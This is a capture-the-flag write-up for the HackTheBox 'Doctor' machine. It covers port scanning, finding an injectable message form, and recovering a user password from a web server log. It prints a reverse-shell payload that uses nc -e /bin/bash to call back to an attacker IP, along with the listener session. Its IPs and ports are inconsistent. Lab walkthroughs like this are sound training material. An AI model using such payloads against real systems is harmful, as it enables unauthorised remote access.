# Doctor 10.10.10.209 ![Got User on 5 Jan 2020](https://lh3.googleusercontent.com/pzhaGTrWNrhIzeuN033vuw_Xfr6kz2bU6eKC5nYi22JKGBLyRXBsmbvjOolG2h75W3nw2IkQra9kzoH1k4L_P0lr-zgvlTfUEn3z4_cHuh3qKDwAFYB6cEfMc7eWjdosWTcBee_L) ## **Background** **Dictor** is a Linux machine from [HackTheBox](https://www.hackthebox.eu/home/machines/profile/278). A web application was hosted at this server which had the XSS vulnerability. The initial access was got when submitted a reverse shell XSS payload. A password changing record was found at the web server log, the user flag got. \ <130n@calvinlai.com> **Target Machine**: 10.10.10.209 **Attacker Machine**: 10.10.14.16 ## **Hacking Process Part 0 – Service Scanning** ### **Quick Pre-searching** ![nmap -p- -T5 --min-rate=1000 10.10.10.209-oG fkclai.nmap](https://lh5.googleusercontent.com/hTN6T4juA3z1wE1ST6WkbfQNQS03ESqkoCESJJrhKPvFYbI2ai0yhG8C98CTB5ri3hC0_ae4txjuHkFRJhp4qcNMR1WzNLjQTpJIexr1m8OIG2jwHcF3pnPogEpgbuRf75UBcwny) ### **Details Analysis** ![nmap -p $(grep -Eo '\[0-9\]{1,5}/open' fkclai.nmap | cut -d '/' -f 1 | tr -s '\n' ',') -sC -sV 10.10.10.209 -o nmap-result.txt](https://lh5.googleusercontent.com/DwOGaZHyOzkXHa4NAgTY4TrSvxjtH2BG-HXfUGvnoas0qH0RRhNmZnrlTbxQ0Aunzki0JtOBV1JNeq-EKZZ4idLv07BuIU50LpmgxxsUBDQQoJpUP1D9KpLY_4Scdf1brEBlai4Z) ### **Enumeration strategies** 1. **Check Website Vulnerability** 2. **Check any hidden files/folders of the website** 3. **Check the website** ## **Hacking Process Part 1 – Enumeration** Visit the website and read the page source, it was found that the doctor.htb should be included in the host table before fu**r**ther enumeration. ![](https://lh6.googleusercontent.com/2Ms6ZbEP7KAD_QfsPzM6Q20fN-uWenIQHm77__FEkJ0Fsif39osWjzvBOzMGsKIe5NvuTYBKnKxJhX7lYL4xlydyBdypRFFS5yDPzcSJbhM_Wq4xkVrwr-PlNOmyxYkMW45jzUfy) A login page was found by visiting the ![](https://lh3.googleusercontent.com/JnPU7-jfpvX5cibQ4kXZDHr4hBi05O0xUuwZHa-DeHvjNNlcQi9ncTDyc-fWMWeDgUj37mo9m1AZTFtzoMTcBeGuNS6RqdpUUc03lcWRDzYtuBMlKzOJXbA8RLzlYiB92Zabgjoy) Tried using gobuster and dirb to find another hidden fold, but the result is negative. Nikto also does not has any good news. Finally, registered a user account and enumerate the inside. It was found that there was an XSS vulnerability at the POST message form. ![](https://lh4.googleusercontent.com/qUNXOrqLCofLB0I43Toy8pLvW-beuRuZy-Z-NkwFoVY9TNmWLq9WuDD2GED_2W5s7KziI_vAdo_ex1Pjwvezm-dTmIOn1MoW0TJaTNybGyD37Uir6kUKAfC4rD1l0qlhR7wRmij8) After several tried, this payload was used to get the reverse shell ``` < img src = http://10.10.14.26:8888/$(nc.traditional$IFS-e$IFS/bin/bash$IFS ' 10.10.17.216 '$ IFS ' 6666 ')> ``` ![](https://lh3.googleusercontent.com/KU4ZtplrKVLQoBtSkljjhluWvBbsTi75QVdiSSx_oNjIJ-UtVPCR9cPFkNDx0UJf3QVFUY3Ig1wf2uxxzHGYejd4Yg5ke_T3OsPFCSNdQe2-XPZeBkSD1gMfqCf_3zbiEi6jcntC) ```c root@fkclai:~/Documents/ctf/htb/linux/19-HTB-doctor# nc -nvlp 1234 listening on [any] 6666 ... connect to [10.10.14.16] from (UNKNOWN) [10.10.10.209] 38714 whoami web python3 -c 'import pty;pty .spawn("/bin/bash")' web@doctor:~$ web@doctor:~$ cd /home/ web@doctor:/home$ ls shaun web web@doctor:/home$ cd shaun/ web@doctor:/home/shaun$ ls user.txt web@doctor:/home/ shaun$ cat user.txt cat: user.txt: Permission denied web@doctor:/home/shaun$ ``` ## **Hacking Process Part 2 –** Gaining Foothold After the user account "*Shaun*" was found that saved the user.txt, focusing the enumeration of this account. Finally, visited the apache2 log, there was a password reset process of this account *Shaun* was found at the acess.log. The password of this user account *shaun* is Guitar123 ![](https://lh3.googleusercontent.com/AE8xnPQBY9JKhQy5tRZ2L0tOq3CmLiBqdQI65R8SfpRzwXIy4iqHY1qMfVXbZnBlTBaeKAmbyTejZgeqmn8OFHErw1SXbtjnfyBcwRx610bx7tNEU-zcD-Ifq6LPDjcuQFnZINVz) sudo this user account, the user flag was found.